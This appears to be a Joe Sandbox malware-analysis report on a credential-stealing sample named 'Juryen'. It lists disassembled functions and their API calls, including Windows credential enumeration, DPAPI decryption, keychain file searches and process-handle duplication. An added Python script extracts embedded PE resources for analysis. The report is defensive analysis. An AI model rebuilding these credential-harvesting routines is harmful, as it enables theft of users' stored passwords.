413fa6 _wcsicmp _wcsicmp 39152->39513 39157 409d1f 6 API calls 39153->39157 39155 445e12 39162 445e6b 39155->39162 39169 40b2cc 27 API calls 39155->39169 39160 445c37 39157->39160 39158 445aa1 39161 445b17 39158->39161 39176 445ab2 memset 39158->39176 39189 409d1f 6 API calls 39158->39189 39486 40add4 39158->39486 39491 445389 39158->39491 39500 40ae51 39158->39500 39159 4456eb 39165 4456fd memset memset memset memset 39159->39165 39166 4457ea 39159->39166 39167 445389 259 API calls 39160->39167 39594 40aebe 39161->39594 39621 445093 23 API calls 39162->39621 39514 409c70 wcscpy wcsrchr 39165->39514 39517 413d29 39166->39517 39172 445c47 39167->39172 39173 445e33 39169->39173 39170 445e7e 39175 445f67 39170->39175 39178 40b2cc 27 API calls 39172->39178 39179 409d1f 6 API calls 39173->39179 39184 40b2cc 27 API calls 39175->39184 39180 40b2cc 27 API calls 39176->39180 39182 445c53 39178->39182 39183 445e47 39179->39183 39180->39158 39181 409c70 2 API calls 39185 44577e 39181->39185 39186 409d1f 6 API calls 39182->39186 39620 409b98 GetFileAttributesW 39183->39620 39188 445f73 39184->39188 39190 409c70 2 API calls 39185->39190 39191 445c67 39186->39191 39193 409d1f 6 API calls 39188->39193 39189->39158 39194 44578d 39190->39194 39195 445389 259 API calls 39191->39195 39192 445e56 39192->39162 39198 445e83 memset 39192->39198 39196 445f87 39193->39196 39194->39166 39202 40b2cc 27 API calls 39194->39202 39195->39058 39624 409b98 GetFileAttributesW 39196->39624 39201 40b2cc 27 API calls 39198->39201 39200->39074 39200->39146 39203 445eab 39201->39203 39204 4457a8 39202->39204 39205 409d1f 6 API calls 39203->39205 39206 409d1f 6 API calls 39204->39206 39207 445ebf 39205->39207 39208 4457b8 39206->39208 39209 40ae18 9 API calls 39207->39209 39516 409b98 GetFileAttributesW 39208->39516 39219 445ef5 39209->39219 39211 4457c7 39211->39166 39213 4087b3 338 API calls 39211->39213 39212 40ae51 9 API calls 39212->39219 39213->39166 39214 445f5c 39216 40aebe FindClose 39214->39216 
39215 40add4 2 API calls 39215->39219 39216->39175 39217 40b2cc 27 API calls 39217->39219 39218 409d1f 6 API calls 39218->39219 39219->39212 39219->39214 39219->39215 39219->39217 39219->39218 39221 445f3a 39219->39221 39622 409b98 GetFileAttributesW 39219->39622 39623 445093 23 API calls 39221->39623 39223->39020 39224->39026 39225->39020 39226->39018 39228 40c775 39227->39228 39625 40b1ab free free 39228->39625 39230 40c788 39626 40b1ab free free 39230->39626 39232 40c790 39627 40b1ab free free 39232->39627 39234 40c798 39235 40aa04 free 39234->39235 39236 40c7a0 39235->39236 39628 40c274 memset 39236->39628 39241 40a8ab 9 API calls 39242 40c7c3 39241->39242 39243 40a8ab 9 API calls 39242->39243 39244 40c7d0 39243->39244 39657 40c3c3 39244->39657 39248 40c877 39257 40bdb0 39248->39257 39249 40c86c 39699 4053fe 39 API calls 39249->39699 39255 40c7e5 39255->39248 39255->39249 39256 40c634 50 API calls 39255->39256 39682 40a706 39255->39682 39256->39255 39928 404363 39257->39928 39260 40bf5d 39948 40440c 39260->39948 39261 40bdee 39261->39260 39265 40b2cc 27 API calls 39261->39265 39262 40bddf CredEnumerateW 39262->39261 39266 40be02 wcslen 39265->39266 39266->39260 39273 40be1e 39266->39273 39267 40be26 wcsncmp 39267->39273 39270 40be7d memset 39271 40bea7 memcpy 39270->39271 39270->39273 39272 40bf11 wcschr 39271->39272 39271->39273 39272->39273 39273->39260 39273->39267 39273->39270 39273->39271 39273->39272 39274 40b2cc 27 API calls 39273->39274 39276 40bf43 LocalFree 39273->39276 39951 40bd5d 28 API calls 39273->39951 39952 404423 39273->39952 39275 40bef6 _wcsnicmp 39274->39275 39275->39272 39275->39273 39276->39273 39277 4135f7 39967 4135e0 39277->39967 39280 40b2cc 27 API calls 39281 41360d 39280->39281 39282 40a804 8 API calls 39281->39282 39283 413613 39282->39283 39284 41361b 39283->39284 39285 41363e 39283->39285 39286 40b273 27 API calls 39284->39286 39287 4135e0 FreeLibrary 39285->39287 39288 413625 GetProcAddress 39286->39288 39289 413643 39287->39289 
39288->39285 39290 413648 39288->39290 39289->39049 39291 413658 39290->39291 39292 4135e0 FreeLibrary 39290->39292 39291->39049 39293 413666 39292->39293 39293->39049 39311 40399d 39310->39311 39996 403a16 39311->39996 39313 403a09 40010 40b1ab free free 39313->40010 39315 403a12 wcsrchr 39315->39039 39316 4039a3 39316->39313 39319 4039f4 39316->39319 40007 40a02c CreateFileW 39316->40007 39319->39313 39320 4099c6 2 API calls 39319->39320 39320->39313 39322 414c2e 17 API calls 39321->39322 39323 404048 39322->39323 39324 414c2e 17 API calls 39323->39324 39325 404056 39324->39325 39326 409d1f 6 API calls 39325->39326 39327 404073 39326->39327 39328 409d1f 6 API calls 39327->39328 39329 40408e 39328->39329 39330 409d1f 6 API calls 39329->39330 39331 4040a6 39330->39331 39332 403af5 20 API calls 39331->39332 39333 4040ba 39332->39333 39334 403af5 20 API calls 39333->39334 39335 4040cb 39334->39335 40037 40414f memset 39335->40037 39337 404140 40051 40b1ab free free 39337->40051 39338 4040ec memset 39342 4040e0 39338->39342 39340 404148 39340->39104 39341 4099c6 2 API calls 39341->39342 39342->39337 39342->39338 39342->39341 39343 40a8ab 9 API calls 39342->39343 39343->39342 40064 40a6e6 WideCharToMultiByte 39344->40064 39346 4087ed 40065 4095d9 memset 39346->40065 39349 408809 memset memset memset memset memset 39350 40b2cc 27 API calls 39349->39350 39351 4088a1 39350->39351 39352 409d1f 6 API calls 39351->39352 39353 4088b1 39352->39353 39376 408953 39376->39104 39396 40b633 free 39395->39396 39397 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39396->39397 39398 413f00 Process32NextW 39397->39398 39399 413da5 OpenProcess 39398->39399 39400 413f17 CloseHandle 39398->39400 39401 413eb0 39399->39401 39402 413df3 memset 39399->39402 39400->39141 39401->39398 39404 413ebf free 39401->39404 39405 4099f4 3 API calls 39401->39405 40329 413f27 39402->40329 39404->39401 39405->39401 39406 413e1f 39407 413e37 GetModuleHandleW 39406->39407 40334 413959 39406->40334 

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                    • String ID: dllhost.exe$p+vw@Fvw@Bvw$taskhost.exe$taskhostex.exe
                                                                    • API String ID: 708747863-11196306
                                                                    • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                    • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                    • memset.MSVCRT ref: 00413D7F
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                    • memset.MSVCRT ref: 00413E07
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                    • free.MSVCRT ref: 00413EC1
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                    • CloseHandle.KERNELBASE(00000000,00000000,0000022C), ref: 00413F1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                    • API String ID: 1344430650-1740548384
                                                                    • Opcode ID: 660cab9a07f681a2bc4137dd77eea26a41ac751a59e67e4b34fef9630b289a87
                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                    • Opcode Fuzzy Hash: 660cab9a07f681a2bc4137dd77eea26a41ac751a59e67e4b34fef9630b289a87
                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
Control-flow Graph
Control-flow graph (rendered as an image; only the node data survived): basic blocks 0x40b58d to 0x40b632. GetModuleHandleW and FindResourceW at 0x40b5a4, LoadResource at 0x40b5c2, SizeofResource and LockResource at 0x40b5d0; when the resource was found, the 0x40b5f1 to 0x40b629 block calls sub_40AFCF, memcpy, sub_40B4D3, sub_40B3C1 and sub_40B04B, otherwise the function returns at 0x40b62e.
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                    • String ID: AE$BIN
                                                                    • API String ID: 1668488027-3931574542
                                                                    • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                    • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
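The function above fetches an embedded resource of type "BIN" with ID 0x32 (FindResourceW, LoadResource, SizeofResource, LockResource, memcpy), the usual way a packed configuration or second stage is carried inside the image. The Python below is added here as an illustration; it is not the sample's code and not part of the Joe Sandbox report. It performs the same lookup statically on a file with the standard library only, walking the three-level resource directory (type, name or ID, language) and copying out the leaf data. The minimal PE32 image, the resource layout offsets and the payload bytes are constructed inside the script so it runs offline; returning the first language entry is a simplification of FindResourceW's language selection.

```python
"""Extract a PE resource by type name and ID, the lookup the sample does with
FindResourceW(NULL, MAKEINTRESOURCE(0x32), L"BIN") -> LoadResource ->
SizeofResource -> LockResource -> memcpy.

Added illustration, not the sample's code.  The PE32 image built by
build_sample_pe() and the payload are constructed for the example.
"""
import struct

RES_DIR_ENTRY = struct.Struct("<II")  # IMAGE_RESOURCE_DIRECTORY_ENTRY: Name, OffsetToData


def _rva_to_offset(sections, rva):
    """Map an RVA to a file offset through the section table."""
    for va, vsize, raw_ptr in sections:
        if va <= rva < va + vsize:
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x not in any section" % rva)


def _entries(data, base, dir_off):
    """Yield (name_or_id, offset, is_subdirectory) for one IMAGE_RESOURCE_DIRECTORY."""
    named, ids = struct.unpack_from("<HH", data, base + dir_off + 12)
    pos = base + dir_off + 16
    for _ in range(named + ids):
        name, off = RES_DIR_ENTRY.unpack_from(data, pos)
        pos += 8
        if name & 0x80000000:                      # string name: u16 length + UTF-16LE
            spos = base + (name & 0x7FFFFFFF)
            (n,) = struct.unpack_from("<H", data, spos)
            name = data[spos + 2: spos + 2 + 2 * n].decode("utf-16-le")
        yield name, off & 0x7FFFFFFF, bool(off & 0x80000000)


def find_resource(pe: bytes, res_type, res_id) -> bytes:
    """Return the data of resource (res_type, res_id), first language variant."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    (nsec,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", pe, opt)
    dd = opt + (96 if magic == 0x10B else 112)     # DataDirectory: PE32 vs PE32+
    res_rva, _res_size = struct.unpack_from("<II", pe, dd + 2 * 8)  # entry 2 = resources
    sections = []
    for i in range(nsec):
        sh = opt + opt_size + 40 * i
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, sh + 8)
        sections.append((va, max(vsize, raw_size), raw_ptr))
    base = _rva_to_offset(sections, res_rva)
    for t, t_off, t_dir in _entries(pe, base, 0):
        if t != res_type or not t_dir:
            continue
        for n, n_off, n_dir in _entries(pe, base, t_off):
            if n != res_id or not n_dir:
                continue
            for _lang, d_off, _ in _entries(pe, base, n_off):
                data_rva, size = struct.unpack_from("<II", pe, base + d_off)
                off = _rva_to_offset(sections, data_rva)
                return pe[off:off + size]
    raise LookupError("resource %r/%r not found" % (res_type, res_id))


def build_sample_pe(payload: bytes) -> bytes:
    """Minimal PE32 with one .rsrc section holding payload as BIN / 0x32 / en-US."""
    RSRC_RVA, RSRC_RAW = 0x2000, 0x400

    def rdir(named, ids, name, off):               # directory header plus its single entry
        return struct.pack("<IIHHHH", 0, 0, 0, 0, named, ids) + RES_DIR_ENTRY.pack(name, off)

    rsrc = (rdir(1, 0, 0x80000000 | 88, 0x80000000 | 24)   # level 1: named type "BIN"
            + rdir(0, 1, 0x32, 0x80000000 | 48)             # level 2: ID 0x32
            + rdir(0, 1, 0x409, 72)                         # level 3: lang 0x409 -> data entry
            + struct.pack("<IIII", RSRC_RVA + 96, len(payload), 0, 0)   # at offset 72
            + struct.pack("<H", 3) + "BIN".encode("utf-16-le")          # at offset 88
            + payload)                                                  # at offset 96
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 2 * 8, RSRC_RVA, len(rsrc))   # DataDirectory[2]
    sect = (b".rsrc".ljust(8, b"\0")
            + struct.pack("<IIII", len(rsrc), RSRC_RVA, len(rsrc), RSRC_RAW) + bytes(16))
    hdr = dos + b"PE\0\0" + file_hdr + bytes(opt) + sect
    return hdr.ljust(RSRC_RAW, b"\0") + rsrc


if __name__ == "__main__":
    image = build_sample_pe(b"\x13\x37constructed-config")
    print(find_resource(image, "BIN", 0x32))
```

Against a real dropped file, replace `build_sample_pe(...)` with the file's bytes; the extracted blob is what the sample hands to sub_40AFCF after the memcpy, so it is the right input for a decoder.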
                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 767404330-0
                                                                    • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                    • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$FirstNext
                                                                    • String ID:
                                                                    • API String ID: 1690352074-0
                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041898C
                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystemmemset
                                                                    • String ID:
                                                                    • API String ID: 3558857096-0
                                                                    • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                    • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
Control-flow Graph
Control-flow graph (rendered as an image; only the node data survived): basic blocks 0x44553b to 0x445fb2. The entry calls sub_44DB70 and then sub_40C768, sub_40BDB0, sub_4135F7, sub_4136C0, sub_41366B and sub_444B06; the 0x4456ca block calls the process-enumeration pair sub_413CFA and sub_413D4C followed by sub_413FA6. The remaining blocks repeat a path-building sequence of memset, sub_414C2E, sub_40B2CC, sub_409D1F and sub_409B98 followed by sub_40B6EF, interleaved with sub_445093, sub_445389 and the directory-walk helpers sub_40AE18, sub_40ADD4, sub_40AE51 and sub_40AEBE; library calls in the graph are memset, wcsrchr and _wcsicmp (0x445d3d).
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004455C2
                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                    • memset.MSVCRT ref: 0044570D
                                                                    • memset.MSVCRT ref: 00445725
                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                    • memset.MSVCRT ref: 0044573D
                                                                    • memset.MSVCRT ref: 00445755
                                                                    • memset.MSVCRT ref: 004458CB
                                                                    • memset.MSVCRT ref: 004458E3
                                                                    • memset.MSVCRT ref: 0044596E
                                                                    • memset.MSVCRT ref: 00445A10
                                                                    • memset.MSVCRT ref: 00445A28
                                                                    • memset.MSVCRT ref: 00445AC6
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                    • memset.MSVCRT ref: 00445B52
                                                                    • memset.MSVCRT ref: 00445B6A
                                                                    • memset.MSVCRT ref: 00445C9B
                                                                    • memset.MSVCRT ref: 00445CB3
                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                    • memset.MSVCRT ref: 00445B82
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                    • memset.MSVCRT ref: 00445986
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                    • API String ID: 1963886904-3798722523
